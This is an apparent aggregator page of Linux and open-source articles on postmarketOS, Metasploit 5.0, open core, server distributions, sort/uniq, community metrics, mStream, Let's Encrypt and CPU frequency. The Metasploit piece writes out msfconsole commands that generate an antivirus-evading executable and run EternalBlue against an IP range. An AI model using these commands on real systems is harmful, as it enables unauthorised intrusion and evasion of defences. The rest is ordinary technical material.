PostmarketOS brings old Androids back to life with Linux

This week the creators of postmarketOS came out of the shadows to show what they’ve been making for the past year. Their software takes old Android devices – and some new ones – and boots an alternate operating system: a Linux distribution that brings working software to devices long past their final official update.

Before you get too excited about bringing your old smartphone back to life like Frankenstein’s Monster, know that this isn’t for everyone. In fact, postmarketOS isn’t built to be used by MOST people. Instead, it’s made for hackers, developers, and those willing to spend inordinate amounts of time fussing with software to get a long-unsupported smartphone to a state in which it can do a thing or two.

At some point in the distant future, the creators of postmarketOS hope to develop “a sustainable, privacy and security focused free software mobile OS that is modeled after traditional Linux distributions.” To that end, they’ve got “over 100 booting devices” in a list, with instructions for loading the OS onto each. This does not mean that every device fully WORKS right this minute.

Instead, the list is full of devices on which just a few tiny parts of the phone work. But for those that are super hardcore about loading new and interesting software to their old devices, this might well be enough. Devices from the very well known to the very, very rare are on this list – Fairphone 1 and 2, the Google Glass Explorer Edition, and the original HTC Desire are all here.

Speaking today on Reddit about the future of the project, user “ollieparanoid” suggested that “in the current state, this is aimed at developers, who are both sick of the current state of mobile phone operating systems, and who enjoy contributing to free software projects in their free time and thereby slowly improving the situation.” He added, “If the project should get abandoned at some point, then we still had contributed to other projects by everything we have upstreamed, and you might even benefit from these changes in the future even if you don’t realize it.”

Let us know if you jump in on the party. If you’ve got a device that’s not on the list, let the creators of the software know!

Source

Metasploit, popular hacking and security tool, gets long-awaited update

The open-source Metasploit Framework has long been used by hackers and security professionals alike to break into systems. Now, this popular penetration testing platform, which enables you to find, exploit, and validate security holes, has been given its long-delayed 5.0 refresh.

Rapid7, Metasploit’s parent company, announced this first major release since 2011. It brings many new features and a fresh release cadence to the program. While the Framework itself has remained much the same for years, weekly module updates kept the program up to date and useful.


These modules contain the latest exploit code for applications, operating systems, and platforms. With these, you can both test your own network and hardware’s security… or attack others. Hackers and security pros alike can also leverage Metasploit Framework’s power to create additional custom security tools or write their own exploit code for new security holes.

With this release, Metasploit gains new database and automation application programming interfaces (APIs), evasion modules, and libraries. It also brings expanded language support, improved performance, and better ease of use. This, Rapid7 claims, lays “the groundwork for better teamwork capabilities, tool integration, and exploitation at scale.” That said, if you want an easy-to-use web interface, you need to look to the commercial Metasploit Pro.

Specifically, while Metasploit still uses a PostgreSQL database backend, you can now run the database as a RESTful service. That enables you to run multiple Metasploit consoles and penetration tools simultaneously.

Metasploit has also opened its APIs to more users. Metasploit still has its own unique APIs and network protocol, but it now offers a much more approachable JSON-RPC API as well.

The Framework also now supports three different module languages: Go, Python, and Ruby. You can use any of these to create new evasion modules, which are designed to evade antivirus programs.
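To give a feel for the workflow, here is a minimal sketch of generating an evasive Windows executable from msfconsole. The module shown, evasion/windows/windows_defender_exe, is one of the evasion modules that shipped with 5.0 as far as I know, and the option value is illustrative:

msf5 > use evasion/windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > set FILENAME report.exe
msf5 evasion(windows/windows_defender_exe) > run

The result is an executable payload built to slip past the named antivirus engine.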

All modules can now target multiple hosts. Before this, you couldn’t execute an exploit module against more than one host at a time. Now you can attempt mass attacks without writing a script or manual interaction: set RHOSTS to a range of IPs, or reference a hosts file with the file:// option.
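For example (the module choice and target range here are hypothetical), a mass run from msfconsole looks like this:

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.0/24
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

Swapping the CIDR range for something like file:/tmp/hosts.txt (path hypothetical) reads the target list from disk instead.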


The new Metasploit also improves its module search mechanism, so searching for modules is much faster. Modules have also been given new metadata. So, for example, if you want to know whether a module leaves artifacts on disk, you can search for that.
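For instance, the console’s search command accepts keyword filters such as module type and platform (check help search on your install for the full list of fields):

msf5 > search type:exploit platform:windows smb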

In addition, Metasploit’s new metashell feature enables users to run sessions in the background, upload and download files, or run resource scripts. You could do all this before, but you needed to upgrade to a Meterpreter session first. Meterpreter combines shell functionality with a Ruby client API; it’s overkill for many users now that metashell supports these more basic functions.

Looking ahead, Metasploit development now has two branches. There’s the 4.x stable branch that underpins Metasploit Pro and open-source projects, such as Kali Linux, ParrotSec Linux, and Metasploit Framework itself, and an unstable branch where core development is done.

Previously, a feature might sit in a pull request for months and still cause bugs when it was released in Kali Linux or Metasploit. Now, with an unstable branch, developers can iterate on features more quickly and thoroughly. The net result is Metasploit will be updated far more quickly going forward.

So, if you want to make sure your systems are locked down tight and as secure as possible, use Metasploit. After all, I can assure you, hackers will be using Metasploit to crack into your company for entirely different reasons.


Source

Some Thoughts on Open Core

Why open core software is bad for the FOSS movement.

Nothing is inherently anti-business about Free and Open Source Software (FOSS). In fact, a number of different business models are built on top of FOSS. The best models are those that continue to further FOSS by internal code contributions and that advance the principles of Free Software in general. For instance, there’s the support model, where a company develops free software but sells expert support for it.

Here, I’d like to talk a bit about one of the more problematic models out there, the open core model, because it’s much more prevalent, and it creates some perverse incentives that run counter to Free Software principles.

If you haven’t heard about it, the open core business model is one where a company develops free software (often a network service intended to be run on a server) and builds a base set of users and contributors of that free code base. Once there is a critical mass of features, the company then starts developing an “enterprise” version of the product that contains additional features aimed at corporate use. These enterprise features might include things like extra scalability, login features like LDAP/Active Directory support or Single Sign-On (SSO), or third-party integrations, or it might just be an overall improved version of the product with more code optimizations and speed.

Because such a company wants to charge customers to use the enterprise version, it creates a closed fork of the free software code base, or it might provide the additional proprietary features as modules so it has fewer problems with violating its free software license.

The first problem with the open core model is that, on its face, it doesn’t further the principles behind Free Software, because core developer time gets focused on writing and promoting proprietary software instead. Rather than promoting the importance of the freedoms that Free Software gives both users and developers, these companies often just use FOSS as a kind of freeware to get an initial base of users, and as free crowdsourcing of software developers who build the base product while the company is small and cash-strapped. As the company gets more funding, it’s then able to hire the most active community developers, who then can stop working on the community edition and instead work full-time on the company’s proprietary software.

This brings me to the second problem. The very nature of open core creates a perverse situation where a company is incentivized to put developer effort into improving the proprietary product (that brings in money) and is de-incentivized to move any of those improvements into the Free Software community edition. After all, if the community edition gets more features, why would someone pay for the enterprise edition? As a result, the community edition is often many steps behind the enterprise edition, if it gets many updates at all.

All of those productive core developers are instead working on improving the closed code. The remaining community ends up making improvements, often as (strangely enough) third-party modules, because it can be hard to get the company behind an open core project to accept modules that compete with its enterprise features.

What’s worse is that a lot of the so-called “enterprise” features end up being focused on speed optimizations or basic security features like TLS support—simple improvements you’d want in the free software version. These speed or security improvements never make their way into the community edition, because the company intends that only individuals will use that version.

The message from the company is clear: although the company may support free software on its face (at the beginning), it believes that free software is for hobbyists and proprietary software is for professionals.

The final problem with the open core model is that after these startups move to the enterprise phase and start making money, there is zero incentive to start any new free software projects within the company. After all, if a core developer comes up with a great idea for an improvement or a new side project, that could be something the company could sell, so it winds up under the proprietary software “enterprise” umbrella.

Ultimately, the open core model is a version of Embrace, Extend and Extinguish made famous by Microsoft, only designed for VC-backed startups. The model allows startups to embrace FOSS when they are cash- and developer-strapped to get some free development and users for their software. The moment they have a base product that can justify the next round of VC funding, they move from embracing to extending the free “core” to add proprietary enterprise software. Finally, the free software core gets slowly extinguished. Improvements and new features in the core product slow to a trickle, as the proprietary enterprise product gets the majority of developer time and the differences between the two versions become too difficult to reconcile. The free software version becomes a kind of freeware demo for enterprise users to try out before they get the “real” version. Eventually, the community edition lags too far behind and is abandoned by the company as it tries to hit the profitability phase of its business and no longer can justify developer effort on free software. Proprietary software wins, Free Software loses.

Source

Top 5 Linux Server Distributions | Linux.com

Ah, the age-old question: Which Linux distribution is best suited for servers? Typically, when this question is asked, the standard responses pop up:

  • RHEL
  • SUSE
  • Ubuntu Server
  • Debian
  • CentOS

However, in the name of opening your eyes to something a bit different, I’m going to approach this question from another angle. I want to consider a list of possible distributions that are not only outstanding candidates but also easy to use, and that can serve many functions within your business. In some cases, my choices are drop-in replacements for other operating systems; in others, they require a bit of work to get up to speed.

Some of my choices are community editions of enterprise-grade servers, which could be considered gateways to purchasing a much more powerful platform. You’ll even find one or two entries here to be duty-specific platforms. Most importantly, however, what you’ll find on this list isn’t the usual fare.

ClearOS

What is ClearOS? For home and small business usage, you might not find a better solution. Out of the box, ClearOS includes tools like intrusion detection, a strong firewall, bandwidth management tools, a mail server, a domain controller, and much more. What makes ClearOS stand out above some of the competition is its purpose: to serve as a simple home and SOHO server with a user-friendly, graphical web-based interface. From that interface, you’ll find an application marketplace (Figure 1) with hundreds of apps (some free, some with an associated cost) that makes it incredibly easy to extend the ClearOS feature set. In other words, you make ClearOS the platform your home and small business needs it to be. Best of all, unlike many other alternatives, you only pay for the software and support you need.

There are three different editions of ClearOS:

  • ClearOS Community
  • ClearOS Home
  • ClearOS Business

To make the installation of software even easier, the ClearOS marketplace allows you to select via:

  • By Function (which displays apps according to task)
  • By Category (which displays groups of related apps)
  • Quick Select File (which allows you to select pre-configured templates to get you up and running fast)

In other words, if you’re looking for a Linux Home, SOHO, or SMB server, ClearOS is an outstanding choice (especially if you don’t have the Linux chops to get a standard server up and running).

Fedora Server

You’ve heard of Fedora Linux. Of course you have. It’s one of the finest bleeding-edge distributions on the market. But did you know that the developers of that excellent Fedora desktop distribution also produce a Server edition? The Fedora Server platform is a short-lifecycle, community-supported server OS. This take on the server operating system enables seasoned system administrators, experienced with any flavor of Linux (or any OS at all), to make use of the very latest technologies available in the open source community. There are three key words in that description:

  • Seasoned
  • System
  • Administrators

In other words, new users need not apply. Although Fedora Server is quite capable of handling any task you throw at it, it’s going to require someone with a bit more Linux kung fu to make it work and work well. One very nice inclusion with Fedora Server is that, out of the box, it includes one of the finest open source, web-based interfaces for servers on the market. With Cockpit (Figure 2), you get a quick glance at system resources, logs, storage, and network, as well as the ability to manage accounts, services, applications, and updates.
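If Cockpit isn’t already running on your installation, it can usually be enabled with a single systemd command (assuming the cockpit package is present, as it is on a default Fedora Server install):

$ sudo systemctl enable --now cockpit.socket

The dashboard is then available at https://your-server-ip:9090.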

If you’re okay working with bleeding edge software, and want an outstanding admin dashboard, Fedora Server might be the platform for you.

NethServer

NethServer is about as no-brainer of a drop-in SMB Linux server as you’ll find. With the latest iteration of NethServer, your small business will enjoy:

  • Built-in Samba Active Directory Controller
  • Seamless Nextcloud integration
  • Certificate management
  • Transparent HTTPS proxy
  • Firewall
  • Mail server and filter
  • Web server and filter
  • Groupware
  • IPS/IDS or VPN

All of the included features can be easily configured with a user-friendly, web-based interface that includes single-click installation of modules to expand the NethServer feature set (Figure 3). What sets NethServer apart from ClearOS is that it was designed to make the admin’s job easier. In other words, this platform offers much more in the way of flexibility and power. Unlike ClearOS, which is geared more toward home office and SOHO deployments, NethServer is equally at home in small business environments.

Rockstor

Rockstor is a Linux and Btrfs powered advanced Network Attached Storage (NAS) and cloud storage server that can be deployed for home, SOHO, and small- and mid-sized businesses alike. With Rockstor, you get a full-blown NAS/cloud solution with a user-friendly, web-based GUI tool that is just as easy for admins to set up as it is for users to use. Once you have Rockstor deployed, you can create pools, shares, and snapshots, manage replication and users, share files (with the help of Samba, NFS, SFTP, and AFP), and even extend the feature set, thanks to add-ons (called Rock-ons). The list of Rock-ons includes:

  • CouchPotato (Downloader for usenet and bittorrent users)
  • Deluge (BitTorrent download client)
  • EmbyServer (Emby media server)
  • Ghost (Publishing platform for professional bloggers)
  • GitLab CE (Git repository hosting and collaboration)
  • Gogs Go Git Service (Lightweight Git version control server and front end)
  • Headphones (An automated music downloader for NZB and Torrent)
  • Logitech Squeezebox Server for Squeezebox Devices
  • MariaDB (Relational database management system)
  • NZBGet (Efficient usenet downloader)
  • OwnCloud-Official (Secure file sharing and hosting)
  • Plexpy (Python-based Plex Usage tracker)
  • Rocket.Chat (Open Source Chat Platform)
  • SaBnzbd (Usenet downloader)
  • Sickbeard (Internet PVR for TV shows)
  • Sickrage (Automatic Video Library Manager for TV Shows)
  • Sonarr (PVR for usenet and bittorrent users)
  • Symform (Backup service)

Rockstor also includes an at-a-glance dashboard that gives admins quick access to all the information they need about their server (Figure 4).

Zentyal

Zentyal is another Small Business Server that does a great job of handling multiple tasks. If you’re looking for a Linux distribution that can handle the likes of:

  • Directory and Domain server
  • Mail server
  • Gateway
  • DHCP, DNS, and NTP server
  • Certification Authority
  • VPN
  • Instant Messaging
  • FTP server
  • Antivirus
  • SSO authentication
  • File sharing
  • RADIUS
  • Virtualization Management
  • And more

Zentyal might be your new go-to. Zentyal has been around since 2004 and is based on Ubuntu Server, so it enjoys a rock-solid base and plenty of applications. And with the help of the Zentyal dashboard (Figure 5), admins can easily manage:

  • System
  • Network
  • Logs
  • Software updates and installation
  • Users/groups
  • Domains
  • File sharing
  • Mail
  • DNS
  • Firewall
  • Certificates
  • And much more

Adding new components to the Zentyal server is as simple as opening the Dashboard, clicking on Software Management > Zentyal Components, selecting what you want to add, and clicking Install. The one issue you might find with Zentyal is that it doesn’t offer nearly as many add-ons as you’ll find in the likes of NethServer and ClearOS. But the services it does offer, Zentyal does incredibly well.

Plenty More Where These Came From

This list of Linux servers is clearly not exhaustive. What it is, however, is a unique look at the top five server distributions you’ve probably not heard of. Of course, if you’d rather opt to use a more traditional Linux server distribution, you can always stick with CentOS, Ubuntu Server, SUSE, Red Hat Enterprise Linux, or Debian… most of which are found on every list of best server distributions on the market. If, however, you’re looking for something a bit different, give one of these five distros a try.

Learn more about Linux through the free “Introduction to Linux” course from The Linux Foundation and edX.

Source

Back to Basics: Sort and Uniq | Linux.com

""

Learn the fundamentals of sorting and de-duplicating text on the command line.

If you’ve been using the command line for a long time, it’s easy to take the commands you use every day for granted. But, if you’re new to the Linux command line, there are several commands that make your life easier that you may not stumble upon automatically. In this article, I cover the basics of two commands that are essential in anyone’s arsenal: sort and uniq.

The sort command does exactly what it says: it takes text data as input and outputs sorted data. There are many scenarios on the command line when you may need to sort output, such as the output from a command that doesn’t offer sorting options of its own (or the sort arguments are obscure enough that you just use the sort command instead). In other cases, you may have a text file full of data (perhaps generated with some other script), and you need a quick way to view it in a sorted form.

Let’s start with a file named “test” that contains three lines:


Foo
Bar
Baz

sort can operate on STDIN redirection, on input from a pipe, or, in the case of a file, you can just specify the file on the command line. So, the three following commands all accomplish the same thing:


cat test | sort
sort < test
sort test

And the output that you get from all of these commands is:


Bar
Baz
Foo

Sorting Numerical Output

Now, let’s complicate the file by adding three more lines:


Foo
Bar
Baz
1. ZZZ
2. YYY
11. XXX

If you run one of the above sort commands again, this time you’ll see different output:


11. XXX
1. ZZZ
2. YYY
Bar
Baz
Foo

This is likely not the output you wanted, but it points out an important fact about sort. By default, it sorts alphabetically, not numerically. This means that a line that starts with “11.” is sorted above a line that starts with “1.”, and all of the lines that start with numbers are sorted above lines that start with letters.

To sort numerically, pass sort the -n option:


sort -n test

Bar
Baz
Foo
1. ZZZ
2. YYY
11. XXX

Find the Largest Directories on a Filesystem

Numerical sorting comes in handy for a lot of command-line output—in particular, when your command contains a tally of some kind, and you want to see the largest or smallest in the tally. For instance, if you want to find out what files are using the most space in a particular directory and you want to dig down recursively, you would run a command like this:


du -ckx

This command dives recursively into the current directory and doesn’t traverse any other mountpoints inside that directory. It tallies the file sizes and then outputs each directory in the order it found them, preceded by the size of the files underneath it in kilobytes. Of course, if you’re running such a command, it’s probably because you want to know which directory is using the most space, and this is where sort comes in:


du -ckx | sort -n

Now you’ll get a list of all of the directories underneath the current directory, but this time sorted by file size. If you want to get even fancier, pipe its output to the tail command to see the top ten. On the other hand, if you wanted the largest directories to be at the top of the output, not the bottom, you would add the -r option, which tells sort to reverse the order. So to get the top ten (well, top eight—the first line is the total, and the next line is the size of the current directory):


du -ckx | sort -rn | head

This works, but often people using the du command want to see sizes in more readable output than kilobytes. The du command offers the -h argument that provides “human-readable” output. So, you’ll see output like 9.6G instead of 10024764 with the -k option. When you pipe that human-readable output to sort though, you won’t get the results you expect by default, as it will sort 9.6G above 9.6K, which would be above 9.6M.

The sort command has a -h option of its own, and it acts like -n, but it’s able to parse standard human-readable numbers and sort them accordingly. So, to see the top ten largest directories in your current directory with human-readable output, you would type this:


du -chx | sort -rh | head

Removing Duplicates

The sort command isn’t limited to sorting one file. You might pipe multiple files into it or list multiple files as arguments on the command line, and it will combine them all and sort them. Unfortunately though, if those files contain some of the same information, you will end up with duplicates in the sorted output.

To remove duplicates, you need the uniq command, which by default removes any duplicate lines that are adjacent to each other from its input and outputs the results. So, let’s say you had two files that were different lists of names:


cat namelist1.txt
Jones, Bob
Smith, Mary
Babbage, Walter

cat namelist2.txt
Jones, Bob
Jones, Shawn
Smith, Cathy

You could remove the duplicates by piping to uniq:


sort namelist1.txt namelist2.txt | uniq
Babbage, Walter
Jones, Bob
Jones, Shawn
Smith, Cathy
Smith, Mary
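As an aside, when sorted, de-duplicated output is all you need, sort’s own -u option collapses the sort-plus-uniq pipeline into a single command:

sort -u namelist1.txt namelist2.txt

You still need uniq itself, though, for the -d and -c tricks shown next.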

The uniq command has more tricks up its sleeve than this. It also can output only the duplicated lines, so you can find duplicates in a set of files quickly by adding the -d option:


sort namelist1.txt namelist2.txt | uniq -d
Jones, Bob

You even can have uniq provide a tally of how many times it has found each entry with the -c option:


sort namelist1.txt namelist2.txt | uniq -c
1 Babbage, Walter
2 Jones, Bob
1 Jones, Shawn
1 Smith, Cathy
1 Smith, Mary

As you can see, “Jones, Bob” occurred the most times, but if you had a lot of lines, this sort of tally might be less useful for you, as you’d like the most duplicates to bubble up to the top. Fortunately, you have the sort command:


sort namelist1.txt namelist2.txt | uniq -c | sort -nr
2 Jones, Bob
1 Smith, Mary
1 Smith, Cathy
1 Jones, Shawn
1 Babbage, Walter

Conclusion

I hope these cases of using sort and uniq with realistic examples show you how powerful these simple command-line tools are. Half the secret with these foundational command-line tools is to discover (and remember) they exist so that they’ll be at your command the next time you run into a problem they can solve.

Source

What Metrics Matter: A Guide for Open Source Projects


“Without data, you’re just a person with an opinion.”

Those are the words of W. Edwards Deming, the champion of statistical process control, who was credited as one of the inspirations for what became known as the Japanese post-war economic miracle of 1950 to 1960. Ironically, Japanese manufacturers like Toyota were far more receptive to Deming’s ideas than General Motors and Ford were.

Community management is certainly an art. It’s about mentoring. It’s about having difficult conversations with people who are hurting the community. It’s about negotiation and compromise. It’s about interacting with other communities. It’s about making connections. In the words of Red Hat’s Diane Mueller, it’s about “nurturing conversations.”

However, it’s also about metrics and data.

Some of those metrics have much in common with software development projects more broadly. Others are more specific to the management of the community itself. I think of deciding what to measure, and how, as adhering to five principles.

1. Recognize that behaviors aren’t independent of the measurements you choose to highlight.

In 2008, Dan Ariely published Predictably Irrational, one of a number of books written around that time that introduced behavioral psychology and behavioral economics to the general public. One memorable quote from that book is the following: “Human beings adjust behavior based on the metrics they’re held against. Anything you measure will impel a person to optimize his score on that metric. What you measure is what you’ll get. Period.”

This shouldn’t be surprising. It’s a finding that’s been repeatedly confirmed by research. It should also be familiar to just about anyone with business experience. It’s certainly not news to anyone in sales management, for example. Base sales reps’ (or their managers’) bonuses solely on revenue, and they’ll try to discount whatever it takes to maximize revenue, even if it puts margin in the toilet. Conversely, want the sales force to push a new product line—which will probably take extra effort—but skip the spiffs? Probably not happening.

And lest you think I’m unfairly picking on sales, this behavior is pervasive, all the way up to the CEO, as Ariely describes in a 2010 Harvard Business Review article: “CEOs care about stock value because that’s how we measure them. If we want to change what they care about, we should change what we measure.”

Developers and other community members are not immune.

2. You need to choose relevant metrics.

There’s a lot of folk wisdom floating around about what’s relevant and important that’s not necessarily true. My colleague Dave Neary offers an example from baseball: “In the late ’90s, the key measurements that were used to measure batter skill were RBI (runs batted in) and batting average (how often a player got on base with a hit, divided by the number of at-bats). The Oakland A’s were the first major league team to recruit based on a different measurement of player performance: on-base percentage. This measures how often they get to first base, regardless of how it happens.”

Indeed, the whole revolution of sabermetrics in baseball and elsewhere, which was popularized in Michael Lewis’ Moneyball, often gets talked about in terms of introducing data in a field that historically was more about gut feel and personal experience. But it was also about taking a game that had actually always been fairly numbers-obsessed and coming up with new metrics based on mostly existing data to better measure player value. (The data revolution going on in sports today is more about collecting much more data through video and other means than was previously available.)

3. Quantity may not lead to quality.

As a corollary, collecting lots of tangential but easy-to-capture data isn’t better than just selecting a few measurements you’ve determined are genuinely useful. In a world where online behavior can be tracked with great granularity and displayed in colorful dashboards, it’s tempting to be distracted by sheer data volume, even when it doesn’t deliver any great insight into community health and trajectory.

This may seem like an obvious point: Why measure something that isn’t relevant? In practice, metrics often get chosen because they’re easy to measure, not because they’re particularly useful. They tend to be more about inputs than outputs: The number of developers. The number of forum posts. The number of commits. Collectively, measures like this often get called vanity metrics. They’re ubiquitous, but most people involved with community management don’t think much of them.

Number of downloads may be the worst of the bunch. It’s true that, at some level, they’re an indication of interest in a project. That’s something. But it’s sufficiently distant from actively using the project, much less engaging with the project deeply, that it’s hard to view downloads as a very useful number.

Is there any harm in these vanity metrics? Yes, to the degree that you start thinking that they’re something to base action on. Probably more seriously, stakeholders like company management or industry observers can come to see them as meaningful indicators of project health.

4. Understand what measurements really mean and how they relate to each other.

Neary makes this point to caution against myopia. “In one project I worked on,” he says, “some people were concerned about a recent spike in the number of bug reports coming in because it seemed like the project must have serious quality issues to resolve. However, when we looked at the numbers, it turned out that many of the bugs were coming in because a large company had recently started using the project. The increase in bug reports was actually a proxy for a big influx of new users, which was a good thing.”

In practice, you often have to measure through proxies. This isn’t an inherent problem, but the further you get between what you want to measure and what you’re actually measuring, the harder it is to connect the dots. It’s fine to track progress in closing bugs, writing code, and adding new features. However, those don’t necessarily correlate with how happy users are or whether the project is doing a good job of working towards its long-term objectives, whatever those may be.

5. Different measurements serve different purposes.

Some measurements may be non-obvious but useful for tracking the success of a project and community relative to internal goals. Others may be better suited for a press release or other external consumption. For example, as a community manager, you may really care about the number of meetups, mentoring sessions, and virtual briefings your community has held over the past three months. But it’s the number of contributions and contributors that are more likely to grab the headlines. You probably care about those too. But maybe not as much, depending upon your current priorities.

Still, other measurements may relate to the goals of any sponsoring organizations. The measurements most relevant for projects tied to commercial products are likely to be different from pure community efforts.

Because communities differ and goals differ, it’s not possible to simply compile a metrics checklist, but here are some ideas to think about:

Consider qualitative metrics in addition to quantitative ones. Conducting surveys and other studies can be time-consuming, especially if they’re rigorous enough to yield better-than-anecdotal data. It also requires rigor to construct studies so that they can be used to track changes over time. In other words, it’s a lot easier to measure quantitative contributor activity than it is to suss out if the community members are happier about their participation today than they were a year ago. However, given the importance of culture to the health of a community, measuring it in a systematic way can be a worthwhile exercise.

Breadth of community, including how many are unaffiliated with commercial entities, is important for many projects. The greater the breadth, the greater the potential leverage of the open source development process. It can also be instructive to see how companies and individuals are contributing. Projects can be explicitly designed to better accommodate casual contributors.

Are new contributors able to have an impact, or are they ignored? How long does it take for code contributions to get committed? How long does it take for a reported bug to be fixed or otherwise responded to? If they asked a question in a forum, did anyone answer them? In other words, are you letting contributors contribute?

Advancement within the project is also an important metric. Mikeal Rogers of the Node.js community explains: “The shift that we made was to create a support system and an education system to take a user and turn them into a contributor, first at a very low level, and educate them to bring them into the committer pool and eventually into the maintainer pool. The end result of this is that we have a wide range of skill sets. Rather than trying to attract phenomenal developers, we’re creating new phenomenal developers.”

Whatever metrics you choose, don’t forget why you made them metrics in the first place. I find a helpful question to ask is: “What am I going to do with this number?” If the answer is to just put it in a report or in a press release, that’s not a great answer. Metrics should be measurements that tell you either that you’re on the right path or that you need to take specific actions to course-correct.

For this reason, Stormy Peters, who handles community leads at Red Hat, argues for keeping it simple. She writes, “It’s much better to have one or two key metrics than to worry about all the possible metrics. You can capture all the possible metrics, but as a project, you should focus on moving one. It’s also better to have a simple metric that correlates directly to something in the real world than a metric that is a complicated formula or ratio between multiple things. As project members make decisions, you want them to be able to intuitively feel whether or not it will affect the project’s key metric in the right direction.”

Source

A Personal Streaming Server to Stream Music from Anywhere

mStream is a free, open source and cross-platform personal music streaming server that lets you sync and stream music between all your devices. It consists of a lightweight music streaming server written in Node.js; you can use it to stream your music from your home computer to any device, anywhere.

Server Features

  • Works on Linux, Windows, OSX and Raspbian
  • Dependency Free Installation
  • Light on memory and CPU usage
  • Tested on multi-terabyte libraries

WebApp Features

  • Gapless Playback
  • Milkdrop Visualizer
  • Playlist Sharing
  • Upload Files through the file explorer
  • AutoDJ – Queues up random songs

mStream Express is a special version of the server that comes with all the dependencies pre-packaged, and in this article, we will explain how to install and use it to stream your home music anywhere from Linux.

Before you install mStream, check out the demo: https://demo.mstream.io/

How to Install mStream Express in Linux

The easiest way to install mStream, without facing any dependencies issues is to download the latest version of mStream Express from the release page and run it.

The package comes with an additional set of UI tools and features: a tray icon for easy server management, automatic server boot on startup, and GUI tools for server configuration.

You can use the wget command to download it directly from the command line, unzip the archive file, move into the extracted folder and run the mstreamExpress file as follows.

$ wget -c https://github.com/IrosTheBeggar/mStream/releases/download/3.9.1/mstreamExpress-linux-x64.zip
$ unzip mstreamExpress-linux-x64.zip 
$ cd mstreamExpress-linux-x64/
$ ./mstreamExpress

After starting mstreamExpress, the server configuration interface will show up as shown in the following screenshot. Enter the config options and click on Boot Server.

Configure mStream Express Server

Once the server has booted, you will see the following messages.

mStream Express Server Started

To access the webapp, go to the address: http://localhost:3000 or http://server_ip:3000.

Access mStream Webapp
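If the page doesn’t come up, a quick way to confirm the server is listening (assuming curl is installed and you kept the default port of 3000) is:

$ curl -I http://localhost:3000

A normal HTTP response here means mStream is up, and the problem lies elsewhere, such as a firewall blocking the port.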

You can easily manage the server via the Tray Icon; it has options to disable auto-boot, restart and reconfigure, advanced options, manage DDNS and SSL, among others.

mStream GitHub repository: https://github.com/IrosTheBeggar/mStream.

That’s all! mStream is easy-to-install personal music streaming software. In this article, we showed how to install and use mStream Express in Linux. If you have any queries, reach us via the feedback form below.

Source

Protect Your Websites with Let’s Encrypt

Learn how to use Let’s Encrypt in this tutorial from our archives.

Back in the bad old days, setting up basic HTTPS with a certificate authority cost as much as several hundred dollars per year, and the process was difficult and error-prone. Now we have Let’s Encrypt for free, and the whole thing takes just a few minutes.

Why Encrypt?

Why encrypt your sites? Because unencrypted HTTP sessions are wide open to multiple abuses, from eavesdropping on your visitors to tampering with your pages and injecting code into them.

Internet service providers lead the code-injecting offenders. How to foil their nefarious desires? Your best defense is HTTPS. Let’s review how HTTPS works.

Chain of Trust

You could set up asymmetric encryption between your site and everyone who is allowed to access it. This is very strong protection: GPG (GNU Privacy Guard; see How to Encrypt Email in Linux) and OpenSSH are common tools for asymmetric encryption. These rely on public-private key pairs. You can freely share public keys, while your private keys must be protected and never shared. The public key encrypts, and the private key decrypts.

This is a multi-step process that does not scale for random web-surfing, however, because it requires exchanging public keys before establishing a session, and you have to generate and manage key pairs. An HTTPS session automates public key distribution, and sensitive sites, such as shopping and banking sites, are verified by a third-party certificate authority (CA) such as Comodo, Verisign, or Thawte.

When you visit an HTTPS site, it provides a digital certificate to your web browser. This certificate verifies that your session is strongly encrypted and supplies information about the site, such as the organization’s name, the organization that issued the certificate, and the name of the certificate authority. You can see all of this information, and the digital certificate, by clicking on the little padlock in your web browser’s address bar (Figure 1).

The major web browsers, including Opera, Firefox, Chromium, and Chrome, all rely on the certificate authority to verify the authenticity of the site’s digital certificate. The little padlock gives the status at a glance; green = strong SSL encryption and verified identity. Web browsers also warn you about malicious sites and sites with incorrectly configured SSL certificates, and they treat self-signed certificates as untrusted.

So how do web browsers know who to trust? Browsers include a root store, a batch of root certificates, which are stored in /usr/share/ca-certificates/mozilla/. Site certificates are verified against your root store. Your root store is maintained by your package manager, just like any other software on your Linux system. On Ubuntu, they are supplied by the ca-certificates package. The root store itself is maintained by Mozilla for Linux.
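You can inspect that root store yourself on an Ubuntu system; each file is a single trusted root certificate:

$ ls /usr/share/ca-certificates/mozilla/ | head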

As you can see, it takes a complex infrastructure to make all of this work. If you perform any sensitive online transactions, such as shopping or banking, you are trusting a whole lot of unknown people to protect you.

Encryption Everywhere

Let’s Encrypt is a global certificate authority, similar to the commercial CAs. Let’s Encrypt was founded by the non-profit Internet Security Research Group (ISRG) to make it easier to secure Websites. I don’t consider it sufficient for shopping and banking sites, for reasons which I will get to shortly, but it’s great for securing blogs, news, and informational sites that don’t have financial transactions.

There are at least three ways to use Let’s Encrypt. The best way is with the Certbot client, which is maintained by the Electronic Frontier Foundation (EFF). This requires shell access to your site.

If you are on shared hosting then you probably don’t have shell access. The easiest method in this case is using a host that supports Let’s Encrypt.

If your host does not support Let’s Encrypt, but supports custom certificates, then you can create and upload your certificate manually with Certbot. It’s a complex process, so you’ll want to study the documentation thoroughly.

When you have installed your certificate, use SSL Server Test to test your site.

Let’s Encrypt digital certificates are good for 90 days. When you install Certbot, it should also install a cron job for automatic renewal, and it includes a command to test that the automatic renewal works. You may use your existing private key or certificate signing request (CSR), and it supports wildcard certificates.
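As a minimal sketch of that workflow (this assumes an Apache web server with Certbot’s Apache plugin, and your own domain in place of example.com):

$ sudo certbot --apache -d example.com -d www.example.com
$ sudo certbot renew --dry-run

The first command obtains and installs the certificate; the second runs the built-in check that automatic renewal will work.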

Limitations

Let’s Encrypt has some limitations: it performs only domain validation, that is, it issues a certificate to whoever controls the domain. This is basic SSL. It does not support Organization Validation (OV) or Extended Validation (EV), because it is not possible to automate identity validation. I would not trust a banking or shopping site that uses Let’s Encrypt; let ’em spend the bucks for a complete package that includes identity validation.

As a free-of-cost service run by a non-profit organization, there is no commercial support, only documentation and community support, both of which are quite good.

The Internet is full of malice. Everything should be encrypted. Start with Let’s Encrypt to protect your site visitors.

Source

How to find CPU minimum, current & maximum frequency in Linux

CPU manufacturers programmatically scale the frequency of the processor to save power. You can find out the current and possible frequencies with the commands below.


How to find available frequencies?


cat  /sys/devices/system/cpu/cpu*/cpufreq/scaling_available_frequencies


Sample output:


cat  /sys/devices/system/cpu/cpu*/cpufreq/scaling_available_frequencies
2933000 2128000 1596000
2933000 2128000 1596000


